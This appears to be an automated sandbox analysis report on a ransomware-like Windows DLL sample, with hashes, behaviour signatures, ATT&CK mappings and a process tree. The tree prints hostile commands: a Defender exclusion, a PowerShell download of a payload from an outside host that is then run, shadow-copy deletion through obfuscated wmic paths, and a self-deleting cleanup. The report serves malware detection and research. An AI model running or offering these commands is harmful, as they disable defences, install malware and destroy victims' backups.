Analysis
-
max time kernel
93s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
15-12-2024 08:17
Static task
static1
Behavioral task
behavioral1
Sample
fccd129f6a5b9d2133d14922a3614f02.dll
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
fccd129f6a5b9d2133d14922a3614f02.dll
Resource
win10v2004-20241007-en
General
-
Target
fccd129f6a5b9d2133d14922a3614f02.dll
-
Size
206KB
-
MD5
fccd129f6a5b9d2133d14922a3614f02
-
SHA1
e814c637e6f0c21f3aa9b43fb92cb161b4d451fc
-
SHA256
4b4a87552c44158fb53a72c7294319b0ddde9f99f460425ad5997d3b9121cd1e
-
SHA512
c1594504053bbe2b061880d1ff69819eca8bdd2bc882b74f415ff8a1515389e32b8d7cd1b931d65b042247fd05df1751a000d6da4219427b74e9cdb0e0e52979
-
SSDEEP
3072:4pEegLluZoATP/QGdqlhNFIkiFnZDJVvU1nSXZOAg0Fuj0pJgOgpQkV+tpMEaE:4pDyp2AQq3FWFnRehAOXpQkY7MY
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Temp\Decryptfiles.txt
Signatures
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Blocklisted process makes network request 1 IoCs
flow pid Process 17 4932 powershell.exe -
pid Process 4932 powershell.exe 4620 powershell.exe -
Downloads MZ/PE file
-
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
-
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt eryy65ty.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\Decryptfiles.txt eryy65ty.exe -
Executes dropped EXE 1 IoCs
pid Process 4480 eryy65ty.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XPSUDTARW = "C:\\Users\\Admin\\AppData\\Local\\Temp\\eryy65ty.exe" eryy65ty.exe -
Drops desktop.ini file(s) 4 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini eryy65ty.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini eryy65ty.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini eryy65ty.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini eryy65ty.exe -
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language eryy65ty.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2844 cmd.exe 1048 PING.EXE -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1048 PING.EXE -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 4620 powershell.exe 4620 powershell.exe 4932 powershell.exe 4932 powershell.exe 4480 eryy65ty.exe 4480 eryy65ty.exe 4480 eryy65ty.exe 4480 eryy65ty.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4620 powershell.exe Token: SeDebugPrivilege 4932 powershell.exe Token: SeDebugPrivilege 4480 eryy65ty.exe Token: SeDebugPrivilege 4480 eryy65ty.exe Token: SeDebugPrivilege 4480 eryy65ty.exe Token: SeIncreaseQuotaPrivilege 4876 wmic.exe Token: SeSecurityPrivilege 4876 wmic.exe Token: SeTakeOwnershipPrivilege 4876 wmic.exe Token: SeLoadDriverPrivilege 4876 wmic.exe Token: SeSystemProfilePrivilege 4876 wmic.exe Token: SeSystemtimePrivilege 4876 wmic.exe Token: SeProfSingleProcessPrivilege 4876 wmic.exe Token: SeIncBasePriorityPrivilege 4876 wmic.exe Token: SeCreatePagefilePrivilege 4876 wmic.exe Token: SeBackupPrivilege 4876 wmic.exe Token: SeRestorePrivilege 4876 wmic.exe Token: SeShutdownPrivilege 4876 wmic.exe Token: SeDebugPrivilege 4876 wmic.exe Token: SeSystemEnvironmentPrivilege 4876 wmic.exe Token: SeRemoteShutdownPrivilege 4876 wmic.exe Token: SeUndockPrivilege 4876 wmic.exe Token: SeManageVolumePrivilege 4876 wmic.exe Token: 33 4876 wmic.exe Token: 34 4876 wmic.exe Token: 35 4876 wmic.exe Token: 36 4876 wmic.exe Token: SeIncreaseQuotaPrivilege 4876 wmic.exe Token: SeSecurityPrivilege 4876 wmic.exe Token: SeTakeOwnershipPrivilege 4876 wmic.exe Token: SeLoadDriverPrivilege 4876 wmic.exe Token: SeSystemProfilePrivilege 4876 wmic.exe Token: SeSystemtimePrivilege 4876 wmic.exe Token: SeProfSingleProcessPrivilege 4876 wmic.exe Token: SeIncBasePriorityPrivilege 4876 wmic.exe Token: SeCreatePagefilePrivilege 4876 wmic.exe Token: SeBackupPrivilege 4876 wmic.exe Token: SeRestorePrivilege 4876 wmic.exe Token: SeShutdownPrivilege 4876 wmic.exe Token: SeDebugPrivilege 4876 wmic.exe Token: SeSystemEnvironmentPrivilege 4876 wmic.exe Token: SeRemoteShutdownPrivilege 4876 wmic.exe Token: SeUndockPrivilege 4876 wmic.exe Token: SeManageVolumePrivilege 4876 wmic.exe Token: 33 4876 wmic.exe Token: 34 4876 wmic.exe Token: 35 4876 wmic.exe Token: 36 4876 wmic.exe Token: SeBackupPrivilege 4644 vssvc.exe Token: SeRestorePrivilege 4644 vssvc.exe Token: SeAuditPrivilege 4644 vssvc.exe Token: SeIncreaseQuotaPrivilege 3424 wmic.exe Token: SeSecurityPrivilege 3424 wmic.exe Token: SeTakeOwnershipPrivilege 3424 wmic.exe Token: SeLoadDriverPrivilege 3424 wmic.exe Token: SeSystemProfilePrivilege 3424 wmic.exe Token: SeSystemtimePrivilege 3424 wmic.exe Token: SeProfSingleProcessPrivilege 3424 wmic.exe Token: SeIncBasePriorityPrivilege 3424 wmic.exe Token: SeCreatePagefilePrivilege 3424 wmic.exe Token: SeBackupPrivilege 3424 wmic.exe Token: SeRestorePrivilege 3424 wmic.exe Token: SeShutdownPrivilege 3424 wmic.exe Token: SeDebugPrivilege 3424 wmic.exe Token: SeSystemEnvironmentPrivilege 3424 wmic.exe -
Suspicious use of WriteProcessMemory 31 IoCs
description pid Process procid_target PID 1332 wrote to memory of 1708 1332 rundll32.exe 83 PID 1332 wrote to memory of 1708 1332 rundll32.exe 83 PID 1332 wrote to memory of 1708 1332 rundll32.exe 83 PID 1708 wrote to memory of 2096 1708 rundll32.exe 84 PID 1708 wrote to memory of 2096 1708 rundll32.exe 84 PID 1708 wrote to memory of 2096 1708 rundll32.exe 84 PID 2096 wrote to memory of 4620 2096 cmd.exe 86 PID 2096 wrote to memory of 4620 2096 cmd.exe 86 PID 2096 wrote to memory of 4620 2096 cmd.exe 86 PID 1708 wrote to memory of 1656 1708 rundll32.exe 89 PID 1708 wrote to memory of 1656 1708 rundll32.exe 89 PID 1708 wrote to memory of 1656 1708 rundll32.exe 89 PID 1656 wrote to memory of 4932 1656 cmd.exe 91 PID 1656 wrote to memory of 4932 1656 cmd.exe 91 PID 1656 wrote to memory of 4932 1656 cmd.exe 91 PID 1708 wrote to memory of 3564 1708 rundll32.exe 103 PID 1708 wrote to memory of 3564 1708 rundll32.exe 103 PID 1708 wrote to memory of 3564 1708 rundll32.exe 103 PID 3564 wrote to memory of 4480 3564 cmd.exe 105 PID 3564 wrote to memory of 4480 3564 cmd.exe 105 PID 3564 wrote to memory of 4480 3564 cmd.exe 105 PID 4480 wrote to memory of 4876 4480 eryy65ty.exe 107 PID 4480 wrote to memory of 4876 4480 eryy65ty.exe 107 PID 4480 wrote to memory of 3424 4480 eryy65ty.exe 115 PID 4480 wrote to memory of 3424 4480 eryy65ty.exe 115 PID 4480 wrote to memory of 2844 4480 eryy65ty.exe 116 PID 4480 wrote to memory of 2844 4480 eryy65ty.exe 116 PID 4480 wrote to memory of 2844 4480 eryy65ty.exe 116 PID 2844 wrote to memory of 1048 2844 cmd.exe 119 PID 2844 wrote to memory of 1048 2844 cmd.exe 119 PID 2844 wrote to memory of 1048 2844 cmd.exe 119 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\fccd129f6a5b9d2133d14922a3614f02.dll,#11⤵
- Suspicious use of WriteProcessMemory
PID:1332 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\fccd129f6a5b9d2133d14922a3614f02.dll,#12⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1708 -
C:\Windows\SysWOW64\cmd.execmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2096 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4620
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1656 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4932
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c %temp%/eryy65ty.exe3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3564 -
C:\Users\Admin\AppData\Local\Temp\eryy65ty.exeC:\Users\Admin\AppData\Local\Temp/eryy65ty.exe4⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops desktop.ini file(s)
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4480 -
\??\c:\Windows\system32\wbem\wmic.exec:\uoxnXB\uoxn\..\..\Windows\uoxn\uoxn\..\..\system32\uoxn\uoxn\..\..\wbem\uoxn\uoxnX\..\..\wmic.exe shadowcopy delete5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4876
-
-
\??\c:\Windows\system32\wbem\wmic.exec:\jQMmNR\jQMm\..\..\Windows\jQMm\jQMm\..\..\system32\jQMm\jQMm\..\..\wbem\jQMm\jQMmN\..\..\wmic.exe shadowcopy delete5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3424
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\eryy65ty.exe"5⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2844 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30006⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1048
-
-
-
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4644
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Windows Management Instrumentation
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Credential Access
Credentials from Password Stores
2Credentials from Web Browsers
1Windows Credential Manager
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD53d086a433708053f9bf9523e1d87a4e8
SHA1b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA2566f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd
-
Filesize
16KB
MD51f10d25cf9e35b61c0725b1de5de2145
SHA1ef6e80d09226155002202e57be34879d6bc563dd
SHA25648dfbf61e6c55a5c1c37d12b5d0994d11c3ebbae7d09e0418dd3022f3ba01396
SHA51253acba644bded5047989bce03cd0fd6c7b28cbebdab1f3d433862e1b13616a741b5da6ad515cae44387314f7e91b17b44b70802b2bcba95f7f24e5fb7288c22e
-
Filesize
4KB
MD55a0c1ac1894f29a35c59d1e4c3bd3c05
SHA121f41f169ab6a422f8b3a0e7130bae5b5ff8d44d
SHA256ba277385177cf30b0132bbf98c604f60ae09352c8601e70592cc9d4e199fba43
SHA512ef60b6710e72f2617cd1557e50322e046a039302ee377bf5aeca77f185d02f5048e6147b000804aa845709251ad00c58dc50951dabb48d44e435989b81964bec
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
881KB
MD59049faba5517305c44bd5f28398fb6b9
SHA1036c6b32f3e7d7d689c9b4d482091eebcc669bfa
SHA256d2100ffe58eb50c05d97a3da738ccd1f0be9672c057c26a10140af80595b78c3
SHA51265a33506f970675775468f80b94a3f8bb2d3672e6fb08fc9f2e5107020095ca6d4bca927c59b72488e2ef4208a64a56ced7511ea14c0445cd50ea3ff9b827f6a